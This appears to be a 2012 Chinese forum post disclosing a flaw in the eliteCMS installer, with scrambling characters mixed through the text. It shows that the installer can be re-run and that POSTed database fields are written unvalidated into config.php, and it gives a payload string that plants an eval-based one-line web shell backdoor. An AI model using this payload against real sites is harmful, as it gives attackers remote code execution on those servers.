eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装9 u3 i! _2 M; I. L: E+ k1 J5 E6 H
% ~9 s- Q$ |. ?
另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php
* {, @* y: t- _* O& x/ i我们来看代码:
9 N/ Y F! y8 j8 n3 |4 g2 F4 d
7 m$ ^. Q+ r0 Q...
" \7 `/ c4 [: x. r. melseif ($_GET['step'] == "4") {
, h, X" y" ]. q0 P8 | $file = "../admin/includes/config.php";
! [& @1 W) L3 I" B $write = "<?php\n";
4 m% g& J8 X$ J& D+ o" ~- _6 E $write .= "/**\n";, Q% x- @+ E% k- x
$write .= "*\n";/ R8 I7 z0 g p, ?% u
$write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
/ M" k' a1 a) c* P- B, A$ p- g...略...
; E5 p' a8 j* G/ v $write .= "*\n";
0 \ s x5 K, R $write .= "*/\n";. L1 X+ W. d" f
$write .= "\n";
' ~2 x/ i& x! M0 h9 m- p1 D $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
$ Q* J$ c* Q( m' M+ A $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
' H% P8 u6 S: Q4 x2 o $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";7 ?: C! m- p# {9 W2 K
$write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
* p8 b* d1 R: h$ A7 Y$ G $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
% @& `: `# u! Z9 @7 { V $write .= "if (!\$connection) {\n";
/ t0 M& R1 b& D; k $write .= " die(\"Database connection failed\" .mysql_error());\n";
& u" }0 Y/ I9 p $write .= " \n";+ i, C+ @ d( q. O) I! m" e0 ^1 U
$write .= "} \n";7 Y8 b+ M2 _# \+ s: ?* S( }
$write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";4 L( ^6 y9 N. T) {2 r6 l% b: x4 Y
$write .= "if (!\$db_select) {\n";' e3 c! b9 G# m7 }- v% E2 r/ @8 ^
$write .= " die(\"Database select failed\" .mysql_error());\n";
5 f/ O" k& G) ~( d6 J' w $write .= " \n";. k) V8 N P ^6 x& ]2 Q' o2 e6 n
$write .= "} \n";
1 ]* C6 F- \" U5 k $write .= "?>\n";
/ C- e6 L# y% J I$ H; \1 E
0 J/ g4 h: u( _& {0 F0 Q, l $writer = fopen($file, 'w');' `$ @ o% i6 E
...9 R* i. e u3 w4 q5 W' J& W& M
1 m2 O J9 [+ o1 d% Y在看代码:
( R3 z1 ]2 H, ]4 K. d# B- M 3 y2 m4 R9 H7 N" R) C" E! t, h0 Y
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];$ q* `+ g( U3 e+ b- e9 V2 i6 [. Q
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
- L- O- k* n; V% J: q5 [$_SESSION['DB_USER'] = $_POST['DB_USER']; u' I) ~+ R3 ]: L% a
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];- W2 N7 d4 Q1 |; b3 o8 t) g; p0 O
, X3 z6 \; L8 j+ h# \- w' X7 x
取值未作任何验证- H8 }+ U8 E+ s$ Y4 w* U
如果将数据库名POST数据:, I6 }! a6 W; n0 s/ i% v
( l8 h% U% L3 Q. l"?><?php eval($_POST[c]);?><?php
0 w+ g3 ]; C4 {% y$ g
& F/ x/ u- K v! W4 z将导致一句话后门写入/admin/includes/config.php' _* B" ?( h- m( V
|
发表于 2012-11-18 13:59:27
收藏
支持
反对